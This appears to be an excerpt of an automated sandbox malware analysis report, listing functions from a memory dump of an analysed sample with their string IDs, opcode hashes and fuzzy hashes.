                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                          • API String ID: 0-2877786613
                                                                                          • Opcode ID: 6d120bb732e14bf9a8a0071612b28cc5d5a1a57db96b9fe1ba453deec7cae5df
                                                                                          • Instruction ID: 404f61246886385fdb36b2d57798a35dd82c41c743488386dc223eab7148f066
                                                                                          • Opcode Fuzzy Hash: 6d120bb732e14bf9a8a0071612b28cc5d5a1a57db96b9fe1ba453deec7cae5df
                                                                                          • Instruction Fuzzy Hash: 98313B71A512587AEB11FFD08C46FEFB73DEF55600F00414AFA04AA284EB746A0587FA
                                                                                          Function 05DDE28C Relevance: 5.1, Strings: 4, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                          • API String ID: 0-2877786613
                                                                                          • Opcode ID: c9119869d7042cb679448e774b8518ef7f4daa443609a700bc248cec00baf43e
                                                                                          • Instruction ID: ace3e252806361139ede6303c7595fbe36b1a7a9fc45729723066d07e75a3bc2
                                                                                          • Opcode Fuzzy Hash: c9119869d7042cb679448e774b8518ef7f4daa443609a700bc248cec00baf43e
                                                                                          • Instruction Fuzzy Hash: A9313A71A512187AEB11FFD08C46FEFB77DEF55600F00414AFA04AA284EB746A4587FA
                                                                                          Function 05DDECC2 Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $e$h$o
                                                                                          • API String ID: 0-3662636641
                                                                                          • Opcode ID: 70d69db0c3451c80f86acb8d85c0e5c20d95accda553ade606dc1bd5557d76ba
                                                                                          • Instruction ID: a405d19301e2d3e3ad2f033b12d2427be785e65c261e6623b95237eea934a2f0
                                                                                          • Opcode Fuzzy Hash: 70d69db0c3451c80f86acb8d85c0e5c20d95accda553ade606dc1bd5557d76ba
                                                                                          • Instruction Fuzzy Hash: B8416171E04218BEDF50EBA4CC45FEEB3B9EF45700F00419AA549A6150EF746B848FB2
                                                                                          Function 05DDA86E Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 1$3$d$p
                                                                                          • API String ID: 0-682049505
                                                                                          • Opcode ID: 2ab3d75ff56f595d693085c7db269e2e39b1b643d69f928a10d64a90b17ef9c0
                                                                                          • Instruction ID: ada05cabb2275424c9311206b1143ed3b198d4e14b39b73fe9c9ad795605cbae
                                                                                          • Opcode Fuzzy Hash: 2ab3d75ff56f595d693085c7db269e2e39b1b643d69f928a10d64a90b17ef9c0
                                                                                          • Instruction Fuzzy Hash: 1A313771A15109ABEB14EB94CC55BFE77B8EF04304F008159E909A6240EB759A458BF5
                                                                                          Function 05DDBC8E Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_5c50000_gpgLFpElQuxhEi.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $e$k$o
                                                                                          • API String ID: 0-3624523832
                                                                                          • Opcode ID: 3977a4a9e72f1b9ca65ff5f1806ec779599dbaf2b552263143d1c5c44600d957
                                                                                          • Instruction ID: a2185f44d65aac7111015148f8df9631dc11eb9abf9bcc029570ee8d8c456641
                                                                                          • Opcode Fuzzy Hash: 3977a4a9e72f1b9ca65ff5f1806ec779599dbaf2b552263143d1c5c44600d957
                                                                                          • Instruction Fuzzy Hash: 610196B2900218ABDB14EF98DC84ADEF7B9FF48714F04821EE9195B205E7719944CBB0